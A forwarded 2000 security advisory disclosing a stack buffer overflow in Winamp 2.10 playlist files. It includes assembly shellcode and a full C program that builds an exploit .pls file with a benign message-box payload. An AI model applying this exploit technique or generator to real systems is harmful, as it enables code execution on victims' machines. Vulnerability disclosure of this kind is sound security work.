FYI -----Original Message----- From: darkplan [mailto:[EMAIL PROTECTED]] Sent: Tuesday, January 04, 2000 4:15 PM To: [EMAIL PROTECTED] Subject: Winamp buffer overflow advisory Nullsoft Winamp 2.10 buffer overflow advisory -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Author: Steve Fewer, [EMAIL PROTECTED] http://indigo.ie/~lmf -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Introduction: I recently uncovered a stack based buffer overflow in winamp version 2.10 which lets me execute 'arbitrary code'. It is carried out through .pls files which winamp uses for playlists. This is unnerving as it is a feasible plan to trade playlists on irc during a mp3 trading session with someone. The overflow occurs when an entry greater than 580 bytes is read in from a .pls file. The EIP is the only register overwritten in the next four bytes that follow, from there on is space for your shell code. eg. [playlist] File1=<580 bytes><eip><shell code> NumberOfEntries=1 The first 580 bytes get mangled around in memory but the 585 byte (where our shell code starts) is pointed to by the ESP, therefore a simple 'JMP ESP' or the like will land us back in our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in comctl32.dll which winamp loads. Pointing our EIP into that address lands us back where we want to be. This was all created/tested on Windows 98 [Version 4.10.1998] running on an Intel PII400 with 128MB RAM. The Shell Code: The shell code I wrote for this simply displays a message box and then calls exit(). However Winamp doesn't load msvcrt.dll which is needed to call exit() so we have to load it ourselves. I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling Messagebox I used the address 0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It didn't warrant using GetProcAddress for compatibilities sake. For the OP codes see the exploit further on. // This loads msvcrt.dll push ebp mov ebp,esp xor eax,eax push eax push eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch mov edx,0xBFF776D4 push edx lea eax,[ebp-0Ch] push eax call dword ptr[ebp-10h] // This calls MessageBox to say 'Hi!' push ebp mov ebp,esp xor edi,edi push edi mov byte ptr[ebp-04h],48h mov byte ptr[ebp-03h],69h mov byte ptr[ebp-02h],21h mov edx, 0xBFF5412E push edx push edi lea edx,[ebp-04h] push edx push edx push edi call dword ptr[ebp-08h] // This calls exit() push ebp mov ebp,esp mov edx,0xFFFFFFFF sub edx,0x87FFAAFB push edx xor eax,eax push eax call dword ptr[ebp-04h] The Exploit: <-snip-> /* Stack based buffer overflow exploit for Winamp v2.10 * Author Steve Fewer, 04-01-2k. Mail me at [EMAIL PROTECTED] * * For a detailed description on the exploit see my advisory. * * Tested with Winamp v2.10 using Windows98 on an Intel * PII 400 with 128MB RAM * * http://indigo.ie/~lmf */ #include <stdio.h> int main() { printf("\n\n\t\t.......................................\n"); printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n"); printf("\t\t.......................................\n"); printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n"); printf("\t\t.........http://indigo.ie/~lmf.........\n"); printf("\t\t.......................................\n\n"); char buffer[640]; char eip[8] = "\xF7\xCF\xB9\xBF"; char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2 E\xC6 \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF 4\x50 \xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xF E\x21 \xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xB A\xFF \xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC"; FILE *file; for(int x=0;x<580;x++) { buffer[x] = 0x90; } file = fopen("crAsh.pls","wb"); fprintf(file, "[playlist]\n"); fprintf(file, "File1="); fprintf(file, "%s", buffer); fprintf(file, "%s", eip); fprintf(file, "%s", sploit); fprintf(file, "\nNumberOfEntries=1"); fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; } <-snip-> Steve -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -- NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455 Flat 2, 43 Howitt Road, Belsize Park, London NW3 4LU Epage [EMAIL PROTECTED] [body of text only] _______________________________________________ [EMAIL PROTECTED] http://www.freeamp.org/mailman/listinfo/freeamp-dev
